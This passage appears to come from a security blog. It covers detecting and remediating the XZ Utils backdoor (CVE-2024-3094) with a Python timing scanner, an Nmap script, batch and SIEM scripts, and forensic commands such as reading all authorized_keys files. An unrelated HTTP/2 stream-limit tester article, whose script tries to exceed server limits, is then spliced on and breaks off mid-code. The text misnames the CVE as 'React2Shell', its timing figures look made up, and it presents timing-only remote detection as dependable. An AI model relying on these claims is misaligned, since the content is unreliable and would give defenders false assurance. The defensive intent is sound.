2. SSH Banner Exchange: 20-100ms
3. Key Exchange Init: 50-150ms
4. Authentication Ready: 150-300ms total

Compromised SSH Timing:

1. TCP Connection: 10-50ms
2. SSH Banner Exchange: 50-200ms (slower due to ifunc hooks)
3. Key Exchange Init: 200-500ms (backdoor initialization overhead)
4. Authentication Ready: 500-1500ms total (cryptographic hooking delays)

The backdoor adds overhead in several places:

  1. Library Loading: The ifunc resolver runs additional code during liblzma initialization
  2. Memory Scanning: The backdoor searches process memory for authentication functions to hook
  3. Hook Installation: Modifying function pointers and setting up trampolines takes time
  4. Certificate Inspection: Every authentication attempt is examined for trigger signatures

These delays are consistent and measurable, even without triggering the actual backdoor functionality.

Detection Through Multiple Samples

A single timing measurement might be affected by network latency, server load, or other factors. However, the backdoor creates a consistent pattern:

Statistical Analysis:

Normal SSH server (10 samples):
- Mean: 180ms
- Std Dev: 25ms
- Variance: 625ms²

Backdoored SSH server (10 samples):
- Mean: 850ms
- Std Dev: 180ms
- Variance: 32,400ms²

The backdoored server shows both higher average timing and greater variance, as the backdoor’s overhead varies depending on system state and what initialization code paths execute.
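
Collecting and summarising those samples takes only a few lines. A minimal sketch; the hostname is a placeholder and the pause between samples simply avoids hammering the target:

import socket
import statistics
import time

def sample_handshake(host, port=22, samples=10, timeout=10):
    """Measure SSH banner arrival time, in seconds, over several fresh connections."""
    timings = []
    for _ in range(samples):
        start = time.time()
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.recv(1024)          # wait for the SSH banner
        timings.append(time.time() - start)
        time.sleep(1)                # rate limit between samples
    return timings

timings = sample_handshake("example.com")   # placeholder host
print(f"mean={statistics.mean(timings) * 1000:.0f}ms "
      f"stdev={statistics.stdev(timings) * 1000:.0f}ms")
# A high mean combined with high variance across samples matches the pattern
# described above; a single slow sample on its own proves nothing.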

Banner Analysis

While not definitive, certain configurations increase vulnerability likelihood:

High Risk Indicators:

  • Debian or Ubuntu distribution
  • OpenSSH version 9.6 or 9.7
  • Recent system updates in February-March 2024
  • systemd based initialization
  • SSH daemon with systemd notification enabled

Configuration Detection:

# SSH banner typically reveals:
SSH-2.0-OpenSSH_9.6p1 Debian-5ubuntu1

# Breaking down the information:
# OpenSSH_9.6p1 - Version commonly affected
# Debian-5ubuntu1 - Distribution and package version

Debian and Ubuntu were the primary targets because:

  1. They quickly incorporated the backdoored versions into testing repositories
  2. They use systemd, creating the sshd → libsystemd → liblzma dependency chain
  3. They enable systemd notification in sshd by default

Library Linkage Analysis

On accessible systems, verifying SSH’s library dependencies provides definitive evidence:

ldd /usr/sbin/sshd | grep liblzma
# Output on vulnerable system:
# liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5

readlink -f /lib/x86_64-linux-gnu/liblzma.so.5
# /lib/x86_64-linux-gnu/liblzma.so.5.6.0
#                                    ^^^^ Vulnerable version

However, this requires authenticated access to the target system. For remote scanning, timing analysis remains the primary detection method.

Remote Scanning Tools and Techniques

Python Based Remote Scanner

The Python scanner performs comprehensive timing analysis without requiring authentication:

Core Detection Algorithm:

cat > ssh_backdoor_scanner.py << 'EOF'
#!/usr/bin/env python3

"""
React2Shell Remote SSH Scanner
CVE-2024-3094 Remote Detection Tool
"""

import socket
import time
import sys
import argparse
import statistics
from datetime import datetime

class Colors:
    RED = '\033[0;31m'
    GREEN = '\033[0;32m'
    YELLOW = '\033[1;33m'
    BLUE = '\033[0;34m'
    BOLD = '\033[1m'
    NC = '\033[0m'

class SSHBackdoorScanner:
    def __init__(self, timeout=10):
        self.timeout = timeout
        self.results = {}
        self.suspicious_indicators = 0
        
        # Timing thresholds (in seconds)
        self.HANDSHAKE_NORMAL = 0.2
        self.HANDSHAKE_SUSPICIOUS = 0.5
        self.AUTH_NORMAL = 0.3
        self.AUTH_SUSPICIOUS = 0.8
    
    def test_handshake_timing(self, host, port):
        """Test SSH handshake timing"""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.timeout)
            
            start_time = time.time()
            sock.connect((host, port))
            
            banner = b""
            while b"\n" not in banner:
                chunk = sock.recv(1024)
                if not chunk:
                    break
                banner += chunk
            
            handshake_time = time.time() - start_time
            sock.close()
            
            self.results['handshake_time'] = handshake_time
            
            if handshake_time > self.HANDSHAKE_SUSPICIOUS:
                self.suspicious_indicators += 1
                return False
            return True
        except Exception as e:
            print(f"Error: {e}")
            return None
    
    def test_auth_timing(self, host, port):
        """Test authentication timing probe"""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.timeout)
            sock.connect((host, port))
            
            # Read banner
            banner = b""
            while b"\n" not in banner:
                chunk = sock.recv(1024)
                if not chunk:
                    break
                banner += chunk
            
            # Send client version
            sock.send(b"SSH-2.0-OpenSSH_9.0_Scanner\r\n")
            
            # Measure response time
            start_time = time.time()
            sock.recv(8192)
            auth_time = time.time() - start_time
            
            sock.close()
            
            self.results['auth_time'] = auth_time
            
            if auth_time > self.AUTH_SUSPICIOUS:
                self.suspicious_indicators += 2
                return False
            return True
        except Exception as e:
            return None
    
    def scan(self, host, port=22):
        """Run complete vulnerability scan"""
        print(f"\n[*] Scanning {host}:{port}\n")
        
        self.test_handshake_timing(host, port)
        self.test_auth_timing(host, port)
        
        # Generate report
        if 'handshake_time' in self.results:
            print(f"Handshake Time: {self.results['handshake_time'] * 1000:.1f}ms")
        if 'auth_time' in self.results:
            print(f"Auth Response Time: {self.results['auth_time'] * 1000:.1f}ms")

        if self.suspicious_indicators >= 3:
            print("Status: LIKELY VULNERABLE")
        elif self.suspicious_indicators >= 1:
            print("Status: SUSPICIOUS")
        else:
            print("Status: NOT VULNERABLE")
        # Keep this label consistent: the batch scanner greps for "Suspicious Indicators:"
        print(f"Suspicious Indicators: {self.suspicious_indicators}")

def main():
    parser = argparse.ArgumentParser(description='React2Shell Remote Scanner')
    parser.add_argument('host', help='Target hostname or IP')
    parser.add_argument('-p', '--port', type=int, default=22, help='SSH port')
    parser.add_argument('-t', '--timeout', type=int, default=10, help='Timeout')
    args = parser.parse_args()
    
    scanner = SSHBackdoorScanner(timeout=args.timeout)
    scanner.scan(args.host, args.port)

if __name__ == '__main__':
    main()
EOF

chmod +x ssh_backdoor_scanner.py

Usage:

# Basic scan
./ssh_backdoor_scanner.py example.com

# Custom port
./ssh_backdoor_scanner.py example.com -p 2222

# Extended timeout for high latency networks
./ssh_backdoor_scanner.py example.com -t 15

Output Interpretation:

[*] Testing SSH handshake timing for example.com:22...
    SSH Banner: SSH-2.0-OpenSSH_9.6p1 Debian-5ubuntu1
    Handshake Time: 782.3ms
    [SUSPICIOUS] Unusually slow handshake (>500ms)

[*] Testing authentication timing patterns...
    Auth Response Time: 1205.7ms
    [SUSPICIOUS] Unusual authentication delay (>800ms)

Status: LIKELY VULNERABLE
Confidence: HIGH
Suspicious Indicators: 3

Nmap NSE Script Integration

For integration with existing security scanning workflows, an Nmap NSE script provides standardized vulnerability reporting. Nmap Scripting Engine (NSE) scripts are written in Lua and follow a specific structure that integrates with Nmap’s scanning engine. Create the React2Shell detection script with:

cat > react2shell-detect.nse << 'EOF'
local shortport = require "shortport"
local stdnse = require "stdnse"
local ssh1 = require "ssh1"
local ssh2 = require "ssh2"
local string = require "string"
local nmap = require "nmap"

description = [[
Detects potential React2Shell (CVE-2024-3094) backdoor vulnerability in SSH servers.

This script tests for the backdoored XZ Utils vulnerability by:
1. Analyzing SSH banner information
2. Measuring authentication timing anomalies
3. Testing for unusual SSH handshake behavior
4. Detecting timing delays characteristic of the backdoor
]]

author = "Security Researcher"
license = "Same as Nmap"
categories = {"vuln", "safe", "intrusive"}

portrule = shortport.port_or_service(22, "ssh", "tcp", "open")

-- Timing thresholds (in milliseconds)
local HANDSHAKE_NORMAL = 200
local HANDSHAKE_SUSPICIOUS = 500
local AUTH_NORMAL = 300
local AUTH_SUSPICIOUS = 800

action = function(host, port)
  local output = stdnse.output_table()
  local vuln_table = {
    title = "React2Shell SSH Backdoor (CVE-2024-3094)",
    state = "NOT VULNERABLE",
    risk_factor = "Critical",
    references = {
      "https://nvd.nist.gov/vuln/detail/CVE-2024-3094",
      "https://www.openwall.com/lists/oss-security/2024/03/29/4"
    }
  }
  
  local script_args = {
    timeout = tonumber(stdnse.get_script_args(SCRIPT_NAME .. ".timeout")) or 10,
    auth_threshold = tonumber(stdnse.get_script_args(SCRIPT_NAME .. ".auth-threshold")) or AUTH_SUSPICIOUS
  }
  
  local socket = nmap.new_socket()
  socket:set_timeout(script_args.timeout * 1000)
  
  local detection_results = {}
  local suspicious_count = 0
  
  -- Test 1: SSH Banner and Initial Handshake
  local start_time = nmap.clock_ms()
  local status, err = socket:connect(host, port)
  
  if not status then
    return nil
  end
  
  local banner_status, banner = socket:receive_lines(1)
  local handshake_time = nmap.clock_ms() - start_time
  
  if not banner_status then
    socket:close()
    return nil
  end
  
  detection_results["SSH Banner"] = banner:gsub("[\r\n]", "")
  detection_results["Handshake Time"] = string.format("%dms", handshake_time)
  
  if handshake_time > HANDSHAKE_SUSPICIOUS then
    detection_results["Handshake Analysis"] = string.format("SUSPICIOUS (%dms > %dms)", 
                                                             handshake_time, HANDSHAKE_SUSPICIOUS)
    suspicious_count = suspicious_count + 1
  else
    detection_results["Handshake Analysis"] = "Normal"
  end
  
  socket:close()
  
  -- Test 2: Authentication Timing Probe
  socket = nmap.new_socket()
  socket:set_timeout(script_args.timeout * 1000)
  
  status = socket:connect(host, port)
  if not status then
    output["Detection Results"] = detection_results
    return output
  end
  
  socket:receive_lines(1)
  
  local client_banner = "SSH-2.0-OpenSSH_9.0_Nmap_Scanner\r\n"
  socket:send(client_banner)
  
  start_time = nmap.clock_ms()
  local kex_status, kex_data = socket:receive()
  local auth_time = nmap.clock_ms() - start_time
  
  socket:close()
  
  detection_results["Auth Probe Time"] = string.format("%dms", auth_time)
  
  if auth_time > script_args.auth_threshold then
    detection_results["Auth Analysis"] = string.format("SUSPICIOUS (%dms > %dms)", 
                                                        auth_time, script_args.auth_threshold)
    suspicious_count = suspicious_count + 2
  else
    detection_results["Auth Analysis"] = "Normal"
  end
  
  -- Banner Analysis
  local banner_lower = banner:lower()
  if banner_lower:match("debian") or banner_lower:match("ubuntu") then
    detection_results["Distribution"] = "Debian/Ubuntu (higher risk)"
    
    if banner_lower:match("openssh_9%.6") or banner_lower:match("openssh_9%.7") then
      detection_results["Version Note"] = "OpenSSH version commonly affected"
      suspicious_count = suspicious_count + 1
    end
  end
  
  vuln_table["Detection Results"] = detection_results
  
  if suspicious_count >= 3 then
    vuln_table.state = "LIKELY VULNERABLE"
    vuln_table["Confidence"] = "HIGH"
  elseif suspicious_count >= 2 then
    vuln_table.state = "POSSIBLY VULNERABLE"
    vuln_table["Confidence"] = "MEDIUM"
  elseif suspicious_count >= 1 then
    vuln_table.state = "SUSPICIOUS"
    vuln_table["Confidence"] = "LOW"
  end
  
  vuln_table["Indicators Found"] = string.format("%d suspicious indicators", suspicious_count)
  
  if vuln_table.state ~= "NOT VULNERABLE" then
    vuln_table["Recommendation"] = [[
1. Verify XZ Utils version on target
2. Check if SSH daemon links to liblzma
3. Review SSH authentication logs
4. Consider isolating system pending investigation
    ]]
  end
  
  return vuln_table
end
EOF

Installation:

# Copy to Nmap scripts directory
sudo cp react2shell-detect.nse /usr/local/share/nmap/scripts/

# Update script database
nmap --script-updatedb

Usage Examples:

# Single host scan
nmap -p 22 --script react2shell-detect example.com

# Subnet scan
nmap -p 22 --script react2shell-detect 192.168.1.0/24

# Multiple ports
nmap -p 22,2222,2200 --script react2shell-detect target.com

# Custom thresholds
nmap --script react2shell-detect \
     --script-args='react2shell-detect.auth-threshold=600' \
     -p 22 example.com

Output Format:

PORT   STATE SERVICE
22/tcp open  ssh
| react2shell-detect:
|   VULNERABLE:
|   React2Shell SSH Backdoor (CVE-2024-3094)
|     State: LIKELY VULNERABLE
|     Risk factor: Critical
|     Detection Results:
|       - SSH Banner: OpenSSH_9.6p1 Debian-5ubuntu1
|       - Handshake Time: 625ms
|       - Auth Delay: 1150ms (SUSPICIOUS - threshold 800ms)
|       - Connection Pattern: Avg: 680ms, Variance: 156.3
|       - Distribution: Debian/Ubuntu-based (higher risk profile)
|     
|     Indicators Found: 3 suspicious indicators
|     Confidence: HIGH - Multiple indicators detected
|     
|     Recommendation:
|     1. Verify XZ Utils version on the target
|     2. Check if SSH daemon links to liblzma
|     3. Review SSH authentication logs for anomalies
|     4. Consider isolating system pending investigation

Batch Scanning Infrastructure

For security teams managing large deployments, automated batch scanning provides continuous monitoring:

Scripted Scanning:

#!/bin/bash
# Enterprise batch scanner

SERVERS_FILE="production_servers.txt"
RESULTS_DIR="scan_results_$(date +%Y%m%d)"
ALERT_THRESHOLD=2

mkdir -p "$RESULTS_DIR"

while IFS=':' read -r hostname port || [ -n "$hostname" ]; do
    port=${port:-22}
    echo "[$(date)] Scanning $hostname:$port"

    # Run scan and save results
    ./ssh_backdoor_scanner.py "$hostname" -p "$port" \
        > "$RESULTS_DIR/${hostname}_${port}.txt" 2>&1

    # Check for vulnerabilities (default to 0 if the scan produced no indicator line)
    suspicious=$(grep "Suspicious Indicators:" "$RESULTS_DIR/${hostname}_${port}.txt" \
                | grep -oE '[0-9]+')
    suspicious=${suspicious:-0}

    if [ "$suspicious" -ge "$ALERT_THRESHOLD" ]; then
        echo "ALERT: $hostname:$port shows $suspicious indicators" \
            | mail -s "CVE-2024-3094 Detection Alert" security@company.com
    fi

    # Rate limiting to avoid overwhelming targets
    sleep 2
done < "$SERVERS_FILE"

# Generate summary report
echo "Scan Summary - $(date)" > "$RESULTS_DIR/summary.txt"
grep -l "VULNERABLE" "$RESULTS_DIR"/*.txt | wc -l \
    >> "$RESULTS_DIR/summary.txt"

Server List Format (production_servers.txt):

web-01.production.company.com
web-02.production.company.com:22
database-master.internal:2222
bastion.external.company.com
10.0.1.50
10.0.1.51:2200

SIEM Integration

For enterprise environments with Security Information and Event Management systems:

#!/bin/bash
# SIEM integration script

SYSLOG_SERVER="siem.company.com"
SYSLOG_PORT=514

scan_and_log() {
    local host=$1
    local port=${2:-22}

    result=$(./ssh_backdoor_scanner.py "$host" -p "$port" 2>&1)

    if echo "$result" | grep -q "VULNERABLE"; then
        severity="CRITICAL"
        priority=2
    elif echo "$result" | grep -q "SUSPICIOUS"; then
        severity="WARNING"
        priority=4
    else
        severity="INFO"
        priority=6
    fi

    # Send to syslog
    logger -n "$SYSLOG_SERVER" -P "$SYSLOG_PORT" \
           -p "local0.$priority" \
           -t "react2shell-scan" \
           "[$severity] CVE-2024-3094 scan: host=$host:$port result=$severity"
}

# Scan from asset inventory
while read server; do
    scan_and_log $server
done < asset_inventory.txt

Remediation Steps

Immediate Response for Vulnerable Systems

When a system is identified as potentially compromised:

Step 1: Verify the Finding

# Connect to the system (if possible)
ssh admin@suspicious-server

# Check XZ version
xz --version
# Look for: xz (XZ Utils) 5.6.0 or 5.6.1

# Verify SSH linkage
ldd $(which sshd) | grep liblzma
# If present, check version:
# readlink -f /lib/x86_64-linux-gnu/liblzma.so.5

Step 2: Assess Potential Compromise

# Review authentication logs
grep -E 'Accepted|Failed' /var/log/auth.log | tail -100

# Check for suspicious authentication patterns
# - Successful authentications without corresponding key/password attempts
# - Authentications from unexpected source IPs
# - User accounts that shouldn't have SSH access

# Review active sessions
w
last -20

# Check for unauthorized SSH keys
find /home -name authorized_keys -exec cat {} \;
find /root -name authorized_keys -exec cat {} \;

# Look for unusual processes
ps auxf | less

Step 3: Immediate Containment

If compromise is suspected:

# Isolate the system from network
# Save current state for forensics first
netstat -tupan > /tmp/netstat_snapshot.txt
ps auxf > /tmp/process_snapshot.txt

# Then block incoming SSH
iptables -I INPUT -p tcp --dport 22 -j DROP

# Or shutdown SSH entirely
systemctl stop ssh

Step 4: Remediation

For systems with the vulnerable version but no evidence of compromise:

# Debian/Ubuntu systems
apt-get update
apt-get install --only-upgrade xz-utils

# Verify the new version
xz --version
# Should show 5.4.x or 5.5.x

# Alternative: Explicit downgrade
apt-get install xz-utils=5.4.5-0.3

# Restart SSH to unload old library
systemctl restart ssh

Step 5: Post Remediation Verification

# Verify library version
readlink -f /lib/x86_64-linux-gnu/liblzma.so.5
# Should NOT be 5.6.0 or 5.6.1

# Confirm SSH no longer shows timing anomalies
# Run scanner again from remote system
./ssh_backdoor_scanner.py remediated-server.com

# Monitor for a period
tail -f /var/log/auth.log

System Hardening Post Remediation

After removing the backdoor, implement additional protections:

SSH Configuration Hardening:

Create a secure SSH configuration:

# Edit /etc/ssh/sshd_config

# Disable password authentication
PasswordAuthentication no

# Limit authentication methods
PubkeyAuthentication yes
ChallengeResponseAuthentication no

# Restrict user access
AllowUsers admin deploy monitoring

# Enable additional logging
LogLevel VERBOSE

# Restart SSH
systemctl restart ssh

Monitoring Implementation:

cat > /etc/fail2ban/jail.local << 'EOF'
[sshd]
enabled = true
port = ssh
logpath = /var/log/auth.log
maxretry = 3
bantime = 3600
findtime = 600
EOF

systemctl restart fail2ban

Regular Scanning:

Add automated checking to crontab:

# Create monitoring script
cat > /usr/local/bin/check_xz_backdoor.sh << 'EOF'
#!/bin/bash
/usr/local/bin/ssh_backdoor_scanner.py localhost > /var/log/xz_check.log 2>&1
EOF

chmod +x /usr/local/bin/check_xz_backdoor.sh

# Add to crontab
echo "0 2 * * * /usr/local/bin/check_xz_backdoor.sh" | crontab 

Lessons for the Security Community

Supply Chain Security Imperatives

This attack highlights critical vulnerabilities in the open source ecosystem:

Maintainer Burnout: Many critical projects rely on volunteer maintainers working in isolation. The XZ Utils maintainer was a single individual managing a foundational library with limited resources and support.

Trust But Verify: The security community must develop better mechanisms for verifying not just code contributions, but also the contributors themselves. Multi-year social engineering campaigns can bypass traditional code review.

Automated Analysis: Build systems and binary artifacts must receive the same scrutiny as source code. The XZ backdoor succeeded partly because attention focused on C source files while malicious build scripts and test files went unexamined.

Dependency Awareness: Understanding indirect dependency chains is critical. Few would have identified XZ Utils as SSH-related, yet this unexpected connection enabled the attack.

Detection Strategy Evolution

The fortuitous discovery of this backdoor through performance testing suggests the security community needs new approaches:

Behavioral Baselining: Systems should establish performance baselines for critical services. Deviations, even subtle ones, warrant investigation.

Timing Analysis: Side-channel attacks aren’t just theoretical concerns. Timing differences can reveal malicious code even when traditional signatures fail.

Continuous Monitoring: Point-in-time security assessments miss time-based attacks. Continuous behavioral monitoring can detect anomalies as they emerge.

Cross-Discipline Collaboration: The backdoor was discovered by a database developer doing performance testing, not a security researcher. Encouraging collaboration across disciplines improves security outcomes.

Infrastructure Recommendations

Organizations should implement:

Binary Verification: Don’t just verify source code. Ensure build processes are deterministic and reproducible. Compare binaries across different build environments.

Runtime Monitoring: Deploy tools that can detect unexpected library loading, function hooking, and behavioral anomalies in production systems.

Network Segmentation: Limit the blast radius of compromised systems through proper network segmentation and access controls.

Incident Response Preparedness: Have procedures ready for supply chain compromises, including rapid version rollback and system isolation capabilities.
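
For the binary-verification recommendation above, even a simple checksum comparison against digests obtained from a trusted, reproducible build catches many tampered artifacts. The sketch below is a minimal, hypothetical illustration: the library paths are Debian/Ubuntu defaults and the known-good map is an empty placeholder you would populate from your own verified builds or signed packages.

#!/usr/bin/env python3
"""Minimal sketch: compare local liblzma against known-good SHA-256 digests.

KNOWN_GOOD is a placeholder; populate it from a trusted, reproducible
build or from your distribution's signed packages.
"""
import glob
import hashlib
import sys

# Placeholder: fill in digests you have verified out of band.
KNOWN_GOOD = {
    # "5.4.5": "<sha256 of a trusted liblzma.so.5 build>",
}

def sha256(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def main() -> int:
    # Common locations on Debian/Ubuntu x86_64; adjust for your platform.
    candidates = glob.glob("/lib/x86_64-linux-gnu/liblzma.so.5*") + \
                 glob.glob("/usr/lib/liblzma.so.5*")
    if not candidates:
        print("liblzma not found in the expected locations")
        return 1
    status = 0
    for path in sorted(set(candidates)):
        digest = sha256(path)
        if KNOWN_GOOD and digest not in KNOWN_GOOD.values():
            print(f"MISMATCH {path} sha256={digest}")
            status = 2
        else:
            print(f"{path} sha256={digest}")
    return status

if __name__ == "__main__":
    sys.exit(main())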

The Role of Timing in Security

This attack demonstrates the importance of performance analysis in security:

Performance as Security Signal: Unexplained performance degradation should trigger security investigation, not just performance optimization.

Side Channel Awareness: Developers should understand that any observable behavior, including timing, can reveal system state and potential compromise.

Benchmark Everything: Establish performance baselines for critical systems and alert on deviations.
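
As a concrete illustration of treating timing as a security signal, the sketch below records how long the SSH banner exchange takes and compares each new measurement against a stored baseline. The host, baseline file path, and deviation threshold are assumptions chosen for illustration; the scanner described earlier remains the primary detection tool, and this is only a lightweight baselining aid.

#!/usr/bin/env python3
"""Minimal sketch: baseline SSH banner timing and flag deviations.

Host, port, baseline path, and threshold are illustrative values.
"""
import json
import socket
import statistics
import sys
import time

HOST = "example.com"      # assumption: replace with your server
PORT = 22
BASELINE_FILE = "/var/tmp/ssh_banner_baseline.json"
DEVIATION_FACTOR = 2.0    # alert if the latest time exceeds 2x the baseline median

def measure_banner_time(host: str, port: int, timeout: float = 5.0) -> float:
    start = time.monotonic()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        sock.recv(256)        # read the SSH identification string
    return time.monotonic() - start

def main() -> int:
    elapsed = measure_banner_time(HOST, PORT)
    try:
        with open(BASELINE_FILE) as f:
            history = json.load(f)
    except (FileNotFoundError, json.JSONDecodeError):
        history = []

    if history:
        median = statistics.median(history)
        print(f"latest={elapsed*1000:.1f}ms baseline_median={median*1000:.1f}ms")
        if elapsed > median * DEVIATION_FACTOR:
            print("WARNING: banner timing deviates from baseline; investigate")
            return 2
    else:
        print(f"latest={elapsed*1000:.1f}ms (no baseline yet)")

    history = (history + [elapsed])[-50:]   # keep the last 50 samples
    with open(BASELINE_FILE, "w") as f:
        json.dump(history, f)
    return 0

if __name__ == "__main__":
    sys.exit(main())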

Conclusion

CVE-2024-3094 represents a watershed moment in supply chain security. The sophistication of the attack, spanning years of social engineering and technical preparation, demonstrates that determined adversaries can compromise even well-maintained open source projects.

The backdoor’s discovery was largely fortuitous, happening during unrelated performance testing just before the compromised versions would have reached production systems worldwide. This near-miss should serve as a wake-up call for the entire security community.

The detection tools and methodologies presented in this article provide practical means for identifying compromised systems. However, the broader lesson is that security requires constant vigilance, comprehensive monitoring, and a willingness to investigate subtle anomalies that might otherwise be dismissed as performance issues.

As systems become more complex and supply chains more intricate, the attack surface expands beyond traditional code vulnerabilities to include the entire software development and distribution process. Defending against such attacks requires not just better tools, but fundamental changes in how we approach trust, verification, and monitoring in software systems.

The XZ Utils backdoor was detected and neutralized before widespread exploitation. The next supply chain attack may not be discovered so quickly, or so fortunately. The time to prepare is now.

Additional Resources

Technical References

National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-3094

OpenWall Disclosure: https://www.openwall.com/lists/oss-security/2024/03/29/4

Technical Analysis by Sam James: https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27

Detection Tools

The scanner tools discussed in this article are available for download and can be deployed in production environments for ongoing monitoring. They require no authentication to the target systems and work by analyzing observable timing behavior in the SSH handshake and authentication process.

These tools should be integrated into regular security scanning procedures alongside traditional vulnerability scanners and intrusion detection systems.

Indicators of Compromise

XZ Utils version 5.6.0 or 5.6.1 installed

SSH daemon (sshd) linking to liblzma library

Unusual SSH authentication timing (>800ms for auth probe)

High variance in SSH connection establishment times

Recent XZ Utils updates from February or March 2024

Debian or Ubuntu systems with systemd-enabled SSH (sshd patched to link against libsystemd)

OpenSSH versions 9.6 or 9.7 on Debian-based distributions
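
Several of these indicators can be checked locally with a short script. The sketch below is Debian/Ubuntu oriented; the sshd path and commands are assumptions and should be adapted to your platform.

#!/usr/bin/env python3
"""Minimal sketch: check local XZ Utils version and sshd -> liblzma linkage.

Paths and commands assume a Debian/Ubuntu-style system.
"""
import re
import subprocess

COMPROMISED = {"5.6.0", "5.6.1"}

def run(cmd):
    try:
        return subprocess.run(cmd, capture_output=True, text=True).stdout
    except FileNotFoundError:
        return ""

def main():
    # Indicator: compromised XZ Utils version installed
    out = run(["xz", "--version"])
    match = re.search(r"(\d+\.\d+\.\d+)", out)
    version = match.group(1) if match else "unknown"
    flag = "COMPROMISED VERSION" if version in COMPROMISED else "ok"
    print(f"xz version: {version} [{flag}]")

    # Indicator: sshd resolving liblzma (directly or via libsystemd)
    ldd_out = run(["ldd", "/usr/sbin/sshd"])
    if "liblzma" in ldd_out:
        print("sshd resolves liblzma (expected on systemd-patched builds; "
              "combine with the version check above)")
    else:
        print("sshd does not resolve liblzma")

if __name__ == "__main__":
    main()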

Recommended Actions

Scan all SSH-accessible systems for timing anomalies

Verify XZ Utils versions across your infrastructure

Review SSH authentication logs for suspicious patterns

Implement continuous monitoring for behavioral anomalies

Establish performance baselines for critical services

Develop incident response procedures for supply chain compromises

Consider additional SSH hardening measures

Review and audit all open source dependencies in your environment

Testing Maximum HTTP/2 Concurrent Streams for Your Website

1. Introduction

Understanding and testing your server’s maximum concurrent stream configuration is critical for both performance tuning and security hardening against HTTP/2 attacks. This guide provides comprehensive tools and techniques to test the SETTINGS_MAX_CONCURRENT_STREAMS parameter on your web servers.

This article complements our previous guide on Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from a macOS. While that article focuses on the CVE-2023-44487 Rapid Reset attack, this guide helps you verify that your server properly enforces stream limits, which is a critical defense mechanism.

2. Why Test Stream Limits?

The SETTINGS_MAX_CONCURRENT_STREAMS setting determines how many concurrent requests a client can multiplex over a single HTTP/2 connection. Testing this limit is important because:

  1. Security validation: Confirms your server enforces reasonable stream limits
  2. Configuration verification: Ensures your settings match security recommendations (typically 100-128 streams)
  3. Performance tuning: Helps optimize the balance between throughput and resource consumption
  4. Attack surface assessment: Identifies if servers accept dangerously high stream counts

3. Understanding HTTP/2 Stream Limits

When an HTTP/2 connection is established, the server sends a SETTINGS frame that includes:

SETTINGS_MAX_CONCURRENT_STREAMS: 100

This tells the client the maximum number of concurrent streams allowed. A compliant client should respect this limit, but attackers will not.

3.1. Common Default Values

Web Servers:

  • Nginx: 128 (configurable via http2_max_concurrent_streams)
  • Apache: 100 (configurable via H2MaxSessionStreams)
  • Caddy: 250 (configurable via max_concurrent_streams)
  • LiteSpeed: 100 (configurable in admin panel)

Reverse Proxies and Load Balancers:

  • HAProxy: No default limit (should be explicitly configured)
  • Envoy: 100 (configurable via max_concurrent_streams)
  • Traefik: 250 (configurable via maxConcurrentStreams)

CDN and Cloud Services:

  • CloudFlare: 128 (managed automatically)
  • AWS ALB: 128 (managed automatically)
  • Azure Front Door: 100 (managed automatically)

4. The Stream Limit Testing Script

The following Python script tests your server’s maximum concurrent streams using the h2 library. This script will:

  • Connect to your HTTP/2 server
  • Read the advertised SETTINGS_MAX_CONCURRENT_STREAMS value
  • Attempt to open more streams than the advertised limit
  • Verify that the server actually enforces the limit
  • Provide detailed results and recommendations

4.1. Prerequisites

Install the required Python libraries:

pip3 install h2 hyper --break-system-packages

Verify installation:

python3 -c "import h2; print(f'h2 version: {h2.__version__}')"

4.2. Complete Script

Save the following as http2_stream_limit_tester.py:

#!/usr/bin/env python3
"""
HTTP/2 Maximum Concurrent Streams Tester

Tests the SETTINGS_MAX_CONCURRENT_STREAMS limit on HTTP/2 servers
and attempts to exceed it to verify enforcement.

Usage:
    python3 http2_stream_limit_tester.py --host example.com --port 443

Requirements:
    pip3 install h2 hyper --break-system-packages
"""

import argparse
import socket
import ssl
import time
from typing import Dict, List, Optional, Tuple
from dataclasses import dataclass, field

try:
    from h2.connection import H2Connection
    from h2.config import H2Configuration
    from h2.events import (
        RemoteSettingsChanged,
        StreamEnded,
        DataReceived,
        StreamReset,
        WindowUpdated,
        SettingsAcknowledged,
        ResponseReceived
    )
    from h2.exceptions import ProtocolError
except ImportError:
    print("Error: h2 library not installed")
    print("Install with: pip3 install h2 hyper --break-system-packages")
    exit(1)


@dataclass
class StreamLimitTestResults:
    """Results from stream limit testing"""
    advertised_max_streams: Optional[int] = None
    actual_max_streams: int = 0
    successful_streams: int = 0
    failed_streams: int = 0
    reset_streams: int = 0
    enforcement_detected: bool = False
    test_duration: float = 0.0
    server_settings: Dict = field(default_factory=dict)
    errors: List[str] = field(default_factory=list)


class HTTP2StreamLimitTester:
    """Test HTTP/2 server stream limits"""

    def __init__(
        self,
        host: str,
        port: int = 443,
        path: str = "/",
        use_tls: bool = True,
        timeout: int = 30,
        verbose: bool = False
    ):
        self.host = host
        self.port = port
        self.path = path
        self.use_tls = use_tls
        self.timeout = timeout
        self.verbose = verbose

        self.socket: Optional[socket.socket] = None
        self.h2_conn: Optional[H2Connection] = None
        self.server_max_streams: Optional[int] = None
        self.active_streams: Dict[int, dict] = {}

    def connect(self) -> bool:
        """Establish connection to the server"""
        try:
            # Create socket
            self.socket = socket.create_connection(
                (self.host, self.port),
                timeout=self.timeout
            )

            # Wrap with TLS if needed
            if self.use_tls:
                context = ssl.create_default_context()
                context.check_hostname = True
                context.verify_mode = ssl.CERT_REQUIRED

                # Set ALPN protocols for HTTP/2
                context.set_alpn_protocols(['h2', 'http/1.1'])

                self.socket = context.wrap_socket(
                    self.socket,
                    server_hostname=self.host
                )

                # Verify HTTP/2 was negotiated
                negotiated_protocol = self.socket.selected_alpn_protocol()
                if negotiated_protocol != 'h2':
                    raise Exception(f"HTTP/2 not negotiated. Got: {negotiated_protocol}")

                if self.verbose:
                    print(f"TLS connection established (ALPN: {negotiated_protocol})")

            # Initialize HTTP/2 connection
            config = H2Configuration(client_side=True)
            self.h2_conn = H2Connection(config=config)
            self.h2_conn.initiate_connection()

            # Send connection preface
